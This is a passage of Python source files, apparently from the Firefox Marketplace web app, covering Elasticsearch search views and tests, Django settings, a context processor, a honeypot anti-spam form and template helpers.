unindex_webapps([self.app1.id, self.app2.id])
# Required to purge the suggestions data structure. In Lucene, a
# document is not deleted from a segment, just marked as deleted.
WebappIndexer.get_es().optimize(WebappIndexer.get_index(),
only_expunge_deletes=True)
def test_no_results(self):
with self.assertNumQueries(0):
response = self.client.get(self.url, data={'q': 'whatever',
'lang': 'en-US'})
parsed = json.loads(response.content)
eq_(parsed, [])
def test_suggestions(self):
with self.assertNumQueries(0):
response = self.client.get(self.url, data={'q': 'Something Second',
'lang': 'en-US'})
parsed = json.loads(response.content)
eq_(len(parsed), 1)
eq_(parsed[0], {'manifest_url': self.app2.get_manifest_url(),
'icon': self.app2.get_icon_url(64),
'name': unicode(self.app2.name),
'slug': self.app2.app_slug})
ok_(self.app2.get_icon_url(64).endswith('?modified=fakehash'))
def test_suggestion_default_locale(self):
self.app2.name.locale = 'es'
self.app2.name.save()
self.app2.default_locale = 'es'
self.app2.save()
self.refresh()
with self.assertNumQueries(0):
response = self.client.get(self.url, data={'q': 'Something Second',
'lang': 'en-US'})
parsed = json.loads(response.content)
eq_(len(parsed), 1)
eq_(parsed[0], {'manifest_url': self.app2.get_manifest_url(),
'icon': self.app2.get_icon_url(64),
'name': unicode(self.app2.name),
'slug': self.app2.app_slug})
def test_suggestions_multiple_results(self):
with self.assertNumQueries(0):
response = self.client.get(self.url, data={'q': 'Something',
'lang': 'en-US'})
parsed = json.loads(response.content)
eq_(len(parsed), 2)
# Show app2 first since it gets boosted higher b/c of installs.
eq_(parsed[0], {'manifest_url': self.app2.get_manifest_url(),
'icon': self.app2.get_icon_url(64),
'name': unicode(self.app2.name),
'slug': self.app2.app_slug})
eq_(parsed[1], {'manifest_url': self.app1.get_manifest_url(),
'icon': self.app1.get_icon_url(64),
'name': unicode(self.app1.name),
'slug': self.app1.app_slug})
def test_suggestion_non_gaia_apps(self):
AddonDeviceType.objects.all().delete()
self.app1.save()
self.app2.save()
self.refresh('webapp')
with self.assertNumQueries(0):
response = self.client.get(self.url, data={'q': 'something'})
parsed = json.loads(response.content)
eq_(parsed, [])
def test_suggestions_limit(self):
with self.assertNumQueries(0):
response = self.client.get(self.url, data={'q': 'something',
'lang': 'en-US',
'limit': 1})
parsed = json.loads(response.content)
eq_(len(parsed), 1)
eq_(parsed[0], {'manifest_url': self.app2.get_manifest_url(),
'icon': self.app2.get_icon_url(64),
'name': unicode(self.app2.name),
'slug': self.app2.app_slug})
class TestSimpleESAppSerializer(amo.tests.ESTestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.webapp = Webapp.objects.get(pk=337141)
self.request = RequestFactory().get('/')
RegionMiddleware().process_request(self.request)
self.reindex(Webapp, 'webapp')
self.indexer = S(WebappIndexer).filter(id=337141).execute().objects[0]
self.serializer = SimpleESAppSerializer(self.indexer,
context={'request': self.request})
def test_regions_present(self):
# Regression test for bug 964802.
ok_('regions' in self.serializer.data)
eq_(len(self.serializer.data['regions']),
len(self.webapp.get_regions()))
########NEW FILE########
__FILENAME__ = utils
from elasticutils.contrib.django import S as eu_S
from statsd import statsd
class S(eu_S):
def raw(self):
with statsd.timer('search.raw'):
hits = super(S, self).raw()
statsd.timing('search.took', hits['took'])
return hits
########NEW FILE########
__FILENAME__ = views
from __future__ import absolute_import
import json
from django.conf import settings
from django.http import HttpResponse
from django.utils import translation
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from rest_framework.generics import GenericAPIView
import amo
from translations.helpers import truncate
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import CORSMixin, form_errors, MarketplaceView
from mkt.api.paginator import ESPaginator
from mkt.collections.constants import (COLLECTIONS_TYPE_BASIC,
COLLECTIONS_TYPE_FEATURED,
COLLECTIONS_TYPE_OPERATOR)
from mkt.collections.filters import CollectionFilterSetWithFallback
from mkt.collections.models import Collection
from mkt.collections.serializers import CollectionSerializer
from mkt.features.utils import get_feature_profile
from mkt.search.forms import (ApiSearchForm, DEVICE_CHOICES_IDS,
TARAKO_CATEGORIES_MAPPING)
from mkt.search.serializers import (ESAppSerializer, RocketbarESAppSerializer,
SuggestionsESAppSerializer)
from mkt.search.utils import S
from mkt.webapps.models import Webapp, WebappIndexer
DEFAULT_FILTERS = ['cat', 'device', 'premium_types', 'price', 'sort', 'tag']
DEFAULT_SORTING = {
'popularity': '-popularity',
# TODO: Should popularity replace downloads?
'downloads': '-weekly_downloads',
'rating': '-bayesian_rating',
'created': '-created',
'reviewed': '-reviewed',
'name': 'name_sort',
}
def _get_locale_analyzer():
analyzer = amo.SEARCH_LANGUAGE_TO_ANALYZER.get(translation.get_language())
if not settings.ES_USE_PLUGINS and analyzer in amo.SEARCH_ANALYZER_PLUGINS:
return None
return analyzer
def get_custom_analyzer(language):
"""
Returns name of analyzer based on language name.
"""
if language in amo.STEMMER_MAP:
return '%s_analyzer' % language
return language
def name_only_query(q):
"""
Returns a dictionary with field/value mappings to pass to elasticsearch.
This sets up various queries with boosting against the name field in the
elasticsearch index.
"""
d = {}
rules = {
'match': {'query': q, 'boost': 3, 'analyzer': 'standard'},
'match': {'query': q, 'boost': 4, 'type': 'phrase', 'slop': 1},
'startswith': {'value': q, 'boost': 1.5}
}
# Only add fuzzy queries if q is a single word. It doesn't make sense to do
# a fuzzy query for multi-word queries.
if ' ' not in q:
rules['fuzzy'] = {'value': q, 'boost': 2, 'prefix_length': 1}
for k, v in rules.iteritems():
for field in ('name', 'app_slug', 'author'):
d['%s__%s' % (field, k)] = v
# Exact matches need to be queried against a non-analyzed field. Let's do a
# term query on `name_sort` for an exact match against the app name and
# give it a good boost since this is likely what the user wants.
d['name_sort__term'] = {'value': q, 'boost': 10}
analyzer = _get_locale_analyzer()
if analyzer:
d['name_%s__match' % analyzer] = {
'query': q, 'boost': 2.5,
'analyzer': get_custom_analyzer(analyzer)}
return d
def name_query(q):
"""
Returns a dictionary with field/value mappings to pass to elasticsearch.
Note: This is marketplace specific. See apps/search/views.py for AMO.
"""
more = {
'description__match': {'query': q, 'boost': 0.8, 'type': 'phrase'},
}
analyzer = _get_locale_analyzer()
if analyzer:
more['description_%s__match' % analyzer] = {
'query': q, 'boost': 0.6, 'type': 'phrase',
'analyzer': get_custom_analyzer(analyzer)}
more['tags__match'] = {'query': q}
if ' ' not in q:
more['tags__fuzzy'] = {'value': q, 'prefix_length': 1}
return dict(more, **name_only_query(q))
def _filter_search(request, qs, query, filters=None, sorting=None,
sorting_default='-popularity', region=None, profile=None):
"""
Filter an ES queryset based on a list of filters.
If `profile` (a FeatureProfile object) is provided we filter by the
profile. If you don't want to filter by these don't pass it. I.e. do the
device detection for when this happens elsewhere.
"""
# Intersection of the form fields present and the filters we want to apply.
filters = filters or DEFAULT_FILTERS
sorting = sorting or DEFAULT_SORTING
show = filter(query.get, filters)
if query.get('q'):
qs = qs.query(should=True, **name_query(query['q'].lower()))
if 'cat' in show:
# query['cat'] should be a list, the form clean_cat method takes care
# of that.
qs = qs.filter(category__in=query['cat'])
if 'tag' in show:
# We only allow searching on one tag for now, and not a list.
qs = qs.filter(tags=query['tag'])
if 'price' in show:
if query['price'] == 'paid':
qs = qs.filter(premium_type__in=amo.ADDON_PREMIUMS)
elif query['price'] == 'free':
qs = qs.filter(premium_type__in=amo.ADDON_FREES, price=0)
if 'device' in show:
qs = qs.filter(device=DEVICE_CHOICES_IDS[query['device']])
if 'premium_types' in show:
if query.get('premium_types'):
qs = qs.filter(premium_type__in=query['premium_types'])
if query.get('app_type'):
# Also include `privileged` apps even when we search for `packaged`.
if 'packaged' in query['app_type']:
query['app_type'].push('privileged')
qs = qs.filter(app_type__in=query['app_type'])
if query.get('manifest_url'):
qs = qs.filter(manifest_url=query['manifest_url'])
if query.get('offline') is not None:
qs = qs.filter(is_offline=query.get('offline'))
if query.get('languages'):
langs = [x.strip() for x in query['languages'].split(',')]
qs = qs.filter(supported_locales__in=langs)
if 'sort' in show:
sort_by = [sorting[name] for name in query['sort'] if name in sorting]
# For "Adolescent" regions popularity is global installs + reviews.
if query['sort'] == 'popularity' and region and not region.adolescent:
# For "Mature" regions popularity becomes installs + reviews
# from only that region.
sort_by = ['-popularity_%s' % region.id]
if sort_by:
qs = qs.order_by(*sort_by)
elif not query.get('q'):
if (sorting_default == 'popularity' and region and
not region.adolescent):
# For "Mature" regions popularity becomes installs + reviews
# from only that region.
sorting_default = '-popularity_%s' % region.id
# Sort by a default if there was no query so results are predictable.
qs = qs.order_by(sorting_default)
if profile:
# Exclude apps that require any features we don't support.
qs = qs.filter(**profile.to_kwargs(prefix='features.has_'))
return qs
class SearchView(CORSMixin, MarketplaceView, GenericAPIView):
cors_allowed_methods = ['get']
authentication_classes = [RestSharedSecretAuthentication,
RestOAuthAuthentication]
permission_classes = [AllowAny]
serializer_class = ESAppSerializer
form_class = ApiSearchForm
paginator_class = ESPaginator
def search(self, request):
form_data = self.get_search_data(request)
query = form_data.get('q', '')
base_filters = {'type': form_data['type']}
qs = self.get_query(request, base_filters=base_filters,
region=self.get_region_from_request(request))
profile = get_feature_profile(request)
qs = self.apply_filters(request, qs, data=form_data,
profile=profile)
page = self.paginate_queryset(qs.values_dict())
return self.get_pagination_serializer(page), query
def get(self, request, *args, **kwargs):
serializer, _ = self.search(request)
return Response(serializer.data)
def get_search_data(self, request):
form = self.form_class(request.GET if request else None)
if not form.is_valid():
raise form_errors(form)
return form.cleaned_data
def get_query(self, request, base_filters=None, region=None):
return Webapp.from_search(request, region=region, gaia=request.GAIA,
mobile=request.MOBILE, tablet=request.TABLET,
filter_overrides=base_filters)
def apply_filters(self, request, qs, data=None, profile=None):
# Build region filter.
region = self.get_region_from_request(request)
return _filter_search(request, qs, data, region=region,
profile=profile)
class FeaturedSearchView(SearchView):
collections_serializer_class = CollectionSerializer
def collections(self, request, collection_type=None, limit=1):
filters = request.GET.dict()
region = self.get_region_from_request(request)
if region:
filters.setdefault('region', region.slug)
if collection_type is not None:
qs = Collection.public.filter(collection_type=collection_type)
else:
qs = Collection.public.all()
qs = CollectionFilterSetWithFallback(filters, queryset=qs).qs
preview_mode = filters.get('preview', False)
serializer = self.collections_serializer_class(
qs[:limit], many=True, context={
'request': request,
'view': self,
'use-es-for-apps': not preview_mode}
)
return serializer.data, getattr(qs, 'filter_fallback', None)
def get(self, request, *args, **kwargs):
serializer, _ = self.search(request)
data, filter_fallbacks = self.add_featured_etc(request,
serializer.data)
response = Response(data)
for name, value in filter_fallbacks.items():
response['API-Fallback-%s' % name] = ','.join(value)
return response
def add_featured_etc(self, request, data):
# Tarako categories don't have collections.
if request.GET.get('cat') in TARAKO_CATEGORIES_MAPPING:
return data, {}
types = (
('collections', COLLECTIONS_TYPE_BASIC),
('featured', COLLECTIONS_TYPE_FEATURED),
('operator', COLLECTIONS_TYPE_OPERATOR),
)
filter_fallbacks = {}
for name, col_type in types:
data[name], fallback = self.collections(request,
collection_type=col_type)
if fallback:
filter_fallbacks[name] = fallback
return data, filter_fallbacks
class SuggestionsView(SearchView):
cors_allowed_methods = ['get']
authentication_classes = []
permission_classes = [AllowAny]
serializer_class = SuggestionsESAppSerializer
def get(self, request, *args, **kwargs):
results, query = self.search(request)
names = []
descs = []
urls = []
icons = []
for base_data in results.data['objects']:
names.append(base_data['name'])
descs.append(truncate(base_data['description']))
urls.append(base_data['absolute_url'])
icons.append(base_data['icon'])
# This results a list. Usually this is a bad idea, but we don't return
# any user-specific data, it's fully anonymous, so we're fine.
return HttpResponse(json.dumps([query, names, descs, urls, icons]),
content_type='application/x-suggestions+json')
class RocketbarView(SearchView):
cors_allowed_methods = ['get']
authentication_classes = []
permission_classes = [AllowAny]
serializer_class = RocketbarESAppSerializer
def get(self, request, *args, **kwargs):
limit = request.GET.get('limit', 5)
es_query = {
'apps': {
'completion': {'field': 'name_suggest', 'size': limit},
'text': request.GET.get('q', '').strip()
}
}
results = S(WebappIndexer).get_es().send_request(
'GET', [WebappIndexer.get_index(), '_suggest'], body=es_query)
if 'apps' in results:
data = results['apps'][0]['options']
else:
data = []
serializer = self.get_serializer(data)
# This returns a JSON list. Usually this is a bad idea for security
# reasons, but we don't include any user-specific data, it's fully
# anonymous, so we're fine.
return HttpResponse(json.dumps(serializer.data),
content_type='application/x-rocketbar+json')
########NEW FILE########
__FILENAME__ = settings
import datetime
import os
from lib.settings_base import *
from mkt import asset_bundles
# The origin URL for our Fireplace frontend, from which API requests come.
FIREPLACE_URL = ''
ALLOWED_HOSTS += ['.firefox.com', '.firefox.com.cn']
# We'll soon need a `settings_test_mkt` to override this.
APP_PREVIEW = True
# 403 view to render for CSRF failures.
CSRF_FAILURE_VIEW = 'mkt.site.views.csrf_failure'
# Set log in/log out URLs for redirects to work.
LOGIN_URL = '/login'
LOGOUT_URL = '/logout'
# Let robots tear this place up.
ENGAGE_ROBOTS = True
MKT_FEEDBACK_EMAIL = '[email protected]'
MKT_REVIEWERS_EMAIL = '[email protected]'
MKT_SENIOR_EDITORS_EMAIL = '[email protected]'
MKT_SUPPORT_EMAIL = '[email protected]'
MARKETPLACE_EMAIL = '[email protected]'
ABUSE_EMAIL = 'Firefox Marketplace Staff <[email protected]>'
NOBODY_EMAIL = 'Firefox Marketplace <[email protected]>'
DEFAULT_FROM_EMAIL = 'Firefox Marketplace <[email protected]>'
# Default app name for our webapp as specified in `manifest.webapp`.
WEBAPP_MANIFEST_NAME = 'Marketplace'
ROOT_URLCONF = 'mkt.urls'
INSTALLED_APPS += (
'devhub', # Put here so helpers.py doesn't get loaded first.
'mkt.site',
'mkt.account',
'mkt.api',
'mkt.collections',
'mkt.comm',
'mkt.commonplace',
'mkt.detail',
'mkt.developers',
'mkt.ecosystem',
'mkt.feed',
'mkt.files',
'mkt.fireplace',
'mkt.inapp',
'mkt.lookup',
'mkt.monolith',
'mkt.operators',
'mkt.purchase',
'mkt.ratings',
'mkt.receipts',
'mkt.reviewers',
'mkt.search',
'mkt.stats',
'mkt.submit',
'mkt.zadmin',
'mkt.webapps',
'mkt.webpay',
)
MIDDLEWARE_CLASSES = list(MIDDLEWARE_CLASSES)
MIDDLEWARE_CLASSES.remove('mobility.middleware.DetectMobileMiddleware')
MIDDLEWARE_CLASSES.remove('mobility.middleware.XMobileMiddleware')
MIDDLEWARE_CLASSES.remove('amo.middleware.LocaleAndAppURLMiddleware')
MIDDLEWARE_CLASSES = [
'mkt.api.middleware.GZipMiddleware',
'mkt.site.middleware.CacheHeadersMiddleware'
] + MIDDLEWARE_CLASSES
MIDDLEWARE_CLASSES.append('mkt.site.middleware.RequestCookiesMiddleware')
MIDDLEWARE_CLASSES.append('mkt.carriers.middleware.CarrierURLMiddleware')
MIDDLEWARE_CLASSES.remove('commonware.middleware.FrameOptionsHeader')
MIDDLEWARE_CLASSES.remove(
'django_statsd.middleware.GraphiteRequestTimingMiddleware')
MIDDLEWARE_CLASSES.remove('multidb.middleware.PinningRouterMiddleware')
# We remove this to add it later since it's used after the api auth middleware.
MIDDLEWARE_CLASSES.remove('access.middleware.ACLMiddleware')
MIDDLEWARE_CLASSES += [
'mkt.site.middleware.RedirectPrefixedURIMiddleware',
'mkt.api.middleware.RestOAuthMiddleware',
'mkt.api.middleware.RestSharedSecretMiddleware',
'access.middleware.ACLMiddleware',
'mkt.site.middleware.LocaleMiddleware',
'mkt.regions.middleware.RegionMiddleware',
'mkt.site.middleware.DeviceDetectionMiddleware',
'mkt.site.middleware.DoNotTrackTrackingMiddleware',
'mkt.api.middleware.TimingMiddleware',
'mkt.api.middleware.APIVersionMiddleware',
'mkt.api.middleware.CORSMiddleware',
'mkt.api.middleware.APIPinningMiddleware',
'mkt.api.middleware.APITransactionMiddleware',
'mkt.api.middleware.APIFilterMiddleware',
]
TEMPLATE_DIRS += (path('mkt/templates'), path('mkt/zadmin/templates'))
TEMPLATE_CONTEXT_PROCESSORS = list(TEMPLATE_CONTEXT_PROCESSORS)
TEMPLATE_CONTEXT_PROCESSORS.remove('amo.context_processors.global_settings')
TEMPLATE_CONTEXT_PROCESSORS.remove('amo.context_processors.app')
TEMPLATE_CONTEXT_PROCESSORS += [
'mkt.site.context_processors.global_settings',
'mkt.carriers.context_processors.carrier_data',
]
# Tests.
NOSE_ARGS = [
'--with-fixture-bundling',
'--where=%s' % os.path.join(ROOT, 'mkt')
]
NO_ADDONS_MODULES = (
'addons.views',
)
# Extend AMO's bundles. Sorry, folks. One day when admin goes away this
# will be easier.
MINIFY_BUNDLES['css'].update(asset_bundles.CSS)
MINIFY_BUNDLES['js'].update(asset_bundles.JS)
CELERY_ROUTES.update({
# Devhub.
'mkt.developers.tasks.validator': {'queue': 'devhub'},
'mkt.developers.tasks.fetch_manifest': {'queue': 'devhub'},
'mkt.developers.tasks.fetch_icon': {'queue': 'devhub'},
'mkt.developers.tasks.file_validator': {'queue': 'devhub'},
# Webapps.
'mkt.webapps.tasks.pre_generate_apk': {'queue': 'devhub'},
# Images.
'mkt.developers.tasks.resize_icon': {'queue': 'images'},
'mkt.developers.tasks.resize_preview': {'queue': 'images'},
})
# Paths.
ADDON_ICONS_DEFAULT_PATH = os.path.join(MEDIA_ROOT, 'img/hub')
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + '/img/hub'
PREINSTALL_CONTACT_EMAIL = '[email protected]'
PREINSTALL_TEST_PLAN_URL = 'docs/app-test-template/v1'
PREINSTALL_TEST_PLAN_PATH = os.path.join(
MEDIA_ROOT, PREINSTALL_TEST_PLAN_URL + '/en-US.xlsx')
PREINSTALL_TEST_PLAN_LATEST = datetime.datetime.fromtimestamp(
os.stat(PREINSTALL_TEST_PLAN_PATH).st_mtime)
# Path to store webpay product icons.
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'
# Base URL where webpay product icons are served from.
PRODUCT_ICON_URL = MEDIA_URL + '/product-icons'
# Number of days the webpay product icon is valid for.
# After this period, the icon will be re-fetched from its external URL.
# If you change this value, update the docs:
# https://developer.mozilla.org/en-US/docs/Web/Apps/Publishing/In-app_payments
PRODUCT_ICON_EXPIRY = 1
STATSD_RECORD_KEYS = [
'window.performance.timing.domComplete',
'window.performance.timing.domInteractive',
'window.performance.timing.domLoading',
'window.performance.timing.loadEventEnd',
'window.performance.timing.responseStart',
'window.performance.timing.fragment.loaded',
'window.performance.navigation.redirectCount',
'window.performance.navigation.type',
]
PISTON_DISPLAY_ERRORS = False
# Key for signing requests to BlueVia for developer registration.
BLUEVIA_SECRET = ''
BLUEVIA_ORIGIN = 'https://opentel20.tidprojects.com'
BLUEVIA_URL = BLUEVIA_ORIGIN + '/en/mozilla/?req='
# Allowed `installs_allowed_from` values for manifest validator.
VALIDATOR_IAF_URLS = ['https://marketplace.firefox.com']
# All JS vendor libraries in this list will be excluded from mozmarket.js.
# For example, if receiptverifier is broken and you need to disable it, add
# 'receiptverifier' to the list. See also mkt/site/views.py.
MOZMARKET_VENDOR_EXCLUDE = []
# When True, mozmarket.js will be served as minified JavaScript.
MINIFY_MOZMARKET = True
# GeoIP server settings
# This flag overrides the GeoIP server functions and will force the
# return of the GEOIP_DEFAULT_VAL
GEOIP_URL = ''
GEOIP_DEFAULT_VAL = 'restofworld'
GEOIP_DEFAULT_TIMEOUT = .2
SENTRY_DSN = None
# A smaller range of languages for the Marketplace.
AMO_LANGUAGES = (
'bg', 'bn-BD', 'ca', 'cs', 'da', 'de', 'el', 'en-US', 'es', 'fr', 'ga-IE',
'hr', 'hu', 'it', 'ja', 'ko', 'mk', 'nb-NO', 'nl', 'pl', 'pt-BR', 'ro',
'ru', 'sk', 'sq', 'sr', 'sr-Latn', 'tr', 'zh-CN', 'zh-TW',
)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
# Not shown on the site, but .po files exist and these are available on the
# L10n dashboard. Generally languages start here and move into AMO_LANGUAGES.
# This list also enables translation edits.
HIDDEN_LANGUAGES = (
# List of languages from AMO's settings (excluding mkt's active locales).
'af', 'ar', 'eu', 'fa', 'fi', 'he', 'id', 'mn', 'pt-PT', 'sl', 'sv-SE',
'uk', 'vi',
# The hidden list from AMO's settings:
'cy',
)
# Update this each time there's a major update.
DEV_AGREEMENT_LAST_UPDATED = datetime.date(2012, 2, 23)
# This is the iss (issuer) for app purchase JWTs.
# It must match that of the pay server that processes nav.mozPay().
# In webpay this is the ISSUER setting.
APP_PURCHASE_KEY = 'marketplace-dev.allizom.org'
# This is the shared secret key for signing app purchase JWTs.
# It must match that of the pay server that processes nav.mozPay().
# In webpay this is the SECRET setting.
APP_PURCHASE_SECRET = ''
# This is the aud (audience) for app purchase JWTs.
# It must match that of the pay server that processes nav.mozPay().
# In webpay this is the DOMAIN setting and on B2G this must match
# what's in the provider whitelist.
APP_PURCHASE_AUD = 'marketplace-dev.allizom.org'
# This is the typ for app purchase JWTs.
# It must match that of the pay server that processes nav.mozPay().
# On B2G this must match a provider in the whitelist.
APP_PURCHASE_TYP = 'mozilla/payments/pay/v1'
# This is the typ for signature checking JWTs.
# This is used to integrate with WebPay.
SIG_CHECK_TYP = 'mozilla/payments/sigcheck/v1'
# This is the base filename of the `.zip` containing the packaged app for the
# consumer-facing pages of the Marketplace (aka Fireplace). Expected path:
# /media/packaged-apps/<path>
MARKETPLACE_GUID = 'e6a59937-29e4-456a-b636-b69afa8693b4'
# The UUID for Yogafire (Tarako Marketplace).
# (`Webapp.objects.get(app_slug='marketplace-package').guid` has been
# carefully set on prod, -dev, and stage.)
YOGAFIRE_GUID = 'f34d3c22-3efe-47ca-803d-6c740da1a851'
# A solitude specific settings that allows you to send fake refunds to
# solitude. The matching setting will have to be on in solitude, otherwise
# it will just laugh at your request.
BANGO_FAKE_REFUNDS = False
REST_FRAMEWORK = {
'DEFAULT_MODEL_SERIALIZER_CLASS':
'rest_framework.serializers.HyperlinkedModelSerializer',
'DEFAULT_AUTHENTICATION_CLASSES': (
'mkt.api.authentication.RestOAuthAuthentication',
),
'DEFAULT_RENDERER_CLASSES': (
'mkt.api.renderers.SuccinctJSONRenderer',
),
'DEFAULT_CONTENT_NEGOTIATION_CLASS': (
'mkt.api.renderers.FirstAvailableRenderer'
),
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser',
),
'DEFAULT_PERMISSION_CLASSES': (
# By default no-one gets anything. You will have to override this
# in each resource to match your needs.
'mkt.api.authorization.AllowNone',
),
'DEFAULT_PAGINATION_SERIALIZER_CLASS':
'mkt.api.paginator.CustomPaginationSerializer',
'DEFAULT_FILTER_BACKENDS': (
'rest_framework.filters.DjangoFilterBackend',
),
'EXCEPTION_HANDLER': 'mkt.api.exceptions.custom_exception_handler',
'PAGINATE_BY': 25,
'PAGINATE_BY_PARAM': 'limit'
}
# Tastypie config to match Django Rest Framework.
API_LIMIT_PER_PAGE = 25
# Upon signing out (of Developer Hub/Reviewer Tools), redirect users to
# Developer Hub instead of to Fireplace.
LOGOUT_REDIRECT_URL = '/developers/'
# Name of our Commonplace repositories on GitHub.
COMMONPLACE_REPOS = ['commbadge', 'fireplace', 'marketplace-stats',
'rocketfuel']
COMMONPLACE_REPOS_APPCACHED = []
# A list of the payment providers supported by the marketplace. Currently there
# can be only one value, however we expect this to change in the future.
PAYMENT_PROVIDERS = ['bango']
# Grace period for apps to attain a content rating before they get disabled.
IARC_APP_DISABLE_DATE = datetime.datetime(2014, 4, 15)
# Cache responses for 3 minutes (Expires headers).
CACHE_MIDDLEWARE_SECONDS = 60 * 3
# Set Etag headers.
USE_ETAGS = True
# When True, pre-generate APKs for apps, turn off by default.
PRE_GENERATE_APKS = False
# URL to the APK Factory service.
# See https://github.com/mozilla/apk-factory-service
PRE_GENERATE_APK_URL = (
'https://apk-controller.dev.mozaws.net/application.apk')
########NEW FILE########
__FILENAME__ = context_processors
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.core.urlresolvers import reverse
from tower import ugettext as _
import amo
import mkt
from access import acl
from amo.context_processors import get_collect_timings
from zadmin.models import get_config
def global_settings(request):
"""Store global Marketplace-wide info. used in the header."""
account_links = []
tools_links = []
footer_links = []
context = {}
tools_title = _('Tools')
if request.user.is_authenticated() and getattr(request, 'amo_user', None):
amo_user = request.amo_user
context['is_reviewer'] = acl.check_reviewer(request)
account_links = [
# TODO: Coming soon with payments.
# {'text': _('Account History'),
# 'href': reverse('account.purchases')},
{'text': _('Account Settings'), 'href': '/settings'},
{'text': _('Change Password'),
'href': 'https://login.persona.org/signin'},
{'text': _('Sign out'), 'href': reverse('users.logout')},
]
if '/developers/' not in request.path:
tools_links.append({'text': _('Developer Hub'),
'href': reverse('ecosystem.landing')})
if amo_user.is_developer:
tools_links.append({'text': _('My Submissions'),
'href': reverse('mkt.developers.apps')})
if '/reviewers/' not in request.path and context['is_reviewer']:
footer_links.append({
'text': _('Reviewer Tools'),
'href': reverse('reviewers.apps.queue_pending'),
})
if acl.action_allowed(request, 'AccountLookup', '%'):
footer_links.append({'text': _('Lookup Tool'),
'href': reverse('lookup.home')})
if acl.action_allowed(request, 'Admin', '%'):
footer_links.append({'text': _('Admin Tools'),
'href': reverse('zadmin.home')})
tools_links += footer_links
context['amo_user'] = amo_user
logged = True
else:
context['amo_user'] = AnonymousUser()
logged = False
DESKTOP = (getattr(request, 'TABLET', None) or
not getattr(request, 'MOBILE', None))
request.APP = getattr(request, 'APP', None)
context.update(account_links=account_links,
settings=settings,
amo=amo, mkt=mkt,
APP=amo.FIREFOX,
tools_links=tools_links,
tools_title=tools_title,
footer_links=footer_links,
ADMIN_MESSAGE=get_config('site_notice'),
collect_timings_percent=get_collect_timings(),
is_admin=acl.action_allowed(request, 'Apps', 'Edit'),
DESKTOP=DESKTOP,
logged=logged)
return context
########NEW FILE########
__FILENAME__ = forms
from django import forms
import commonware.log
import happyforms
from tower import ugettext as _
log = commonware.log.getLogger('z.mkt.site.forms')
APP_PUBLIC_CHOICES = (
(0, _('As soon as it is approved.')),
(1, _('Not until I manually make it public.')),
)
class AddonChoiceField(forms.ModelChoiceField):
def label_from_instance(self, obj):
return obj.name
class PotatoCaptchaForm(happyforms.Form):
# This field's value should always be blank (spammers are dumb).
tuber = forms.CharField(required=False, label='',
widget=forms.TextInput(attrs={'class': 'potato-captcha'}))
# This field's value should always be 'potato' (set by JS).
sprout = forms.CharField(required=False, label='',
widget=forms.TextInput(attrs={'class': 'potato-captcha'}))
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(PotatoCaptchaForm, self).__init__(*args, **kwargs)
self.has_potato_recaptcha = True
if self.request.user.is_authenticated():
del self.fields['tuber']
del self.fields['sprout']
self.has_potato_recaptcha = False
def clean(self):
if self.errors:
return
data = self.cleaned_data
if (self.has_potato_recaptcha and
(data.get('tuber') or data.get('sprout') != 'potato')):
ip = self.request.META.get('REMOTE_ADDR', '')
log.info(u'Spammer thwarted: %s' % ip)
raise forms.ValidationError(_('Form could not be submitted.'))
return data
class AbuseForm(PotatoCaptchaForm):
text = forms.CharField(required=True, label='', widget=forms.Textarea)
########NEW FILE########
__FILENAME__ = helpers
import json
from django.conf import settings
import commonware.log
import jinja2
from jingo import env, register
from jingo_minify import helpers as jingo_minify_helpers
from tower import ugettext as _
from amo.helpers import urlparams
from amo.urlresolvers import get_outgoing_url, reverse
from translations.helpers import truncate
log = commonware.log.getLogger('z.mkt.site')
@jinja2.contextfunction
@register.function
def css(context, bundle, media=False, debug=None):
if debug is None:
debug = settings.TEMPLATE_DEBUG
# ?debug=true gives you unminified CSS for testing on -dev/prod.
if context['request'].GET.get('debug'):
debug = True
return jingo_minify_helpers.css(bundle, media, debug)
@jinja2.contextfunction
@register.function
def js(context, bundle, debug=None, defer=False, async=False):
if debug is None:
debug = settings.TEMPLATE_DEBUG
# ?debug=true gives you unminified JS for testing on -dev/prod.
if context['request'].GET.get('debug'):
debug = True
return jingo_minify_helpers.js(bundle, debug, defer, async)
@jinja2.contextfunction
@register.function
def get_media_hash(context):
return jingo_minify_helpers.BUILD_ID_JS + jingo_minify_helpers.BUILD_ID_CSS
def new_context(context, **kw):
c = dict(context.items())
c.update(kw)
return c
@register.function
def no_results():
# This prints a "No results found" message. That's all. Carry on.
t = env.get_template('site/helpers/no_results.html').render()
return jinja2.Markup(t)
@jinja2.contextfunction
@register.function
def market_button(context, product, receipt_type=None, classes=None):
request = context['request']
if product.is_webapp():
purchased = False
classes = (classes or []) + ['button', 'product']
reviewer = receipt_type == 'reviewer'
data_attrs = {'manifest_url': product.get_manifest_url(reviewer),
'is_packaged': json.dumps(product.is_packaged)}
installed = None
if request.amo_user:
installed_set = request.amo_user.installed_set
installed = installed_set.filter(addon=product).exists()
# Handle premium apps.
if product.has_premium():
# User has purchased app.
purchased = (request.amo_user and
product.pk in request.amo_user.purchase_ids())
# App authors are able to install their apps free of charge.
if (not purchased and
request.check_ownership(product, require_author=True)):
purchased = True
if installed or purchased or not product.has_premium():
label = _('Install')
else:
label = product.get_tier_name()
# Free apps and purchased apps get active install buttons.
if not product.is_premium() or purchased:
classes.append('install')
c = dict(product=product, label=label, purchased=purchased,
data_attrs=data_attrs, classes=' '.join(classes))
t = env.get_template('site/helpers/webapp_button.html')
return jinja2.Markup(t.render(c))
def product_as_dict(request, product, purchased=None, receipt_type=None,
src=''):
# Dev environments might not have authors set.
author = ''
author_url = ''
if product.listed_authors:
author = product.listed_authors[0].name
author_url = product.listed_authors[0].get_url_path()
receipt_url = (reverse('receipt.issue', args=[product.app_slug]) if
receipt_type else product.get_detail_url('record'))
token_url = reverse('generate-reviewer-token', args=[product.app_slug])
src = src or request.GET.get('src', '')
reviewer = receipt_type == 'reviewer'
ret = {
'id': product.id,
'name': product.name,
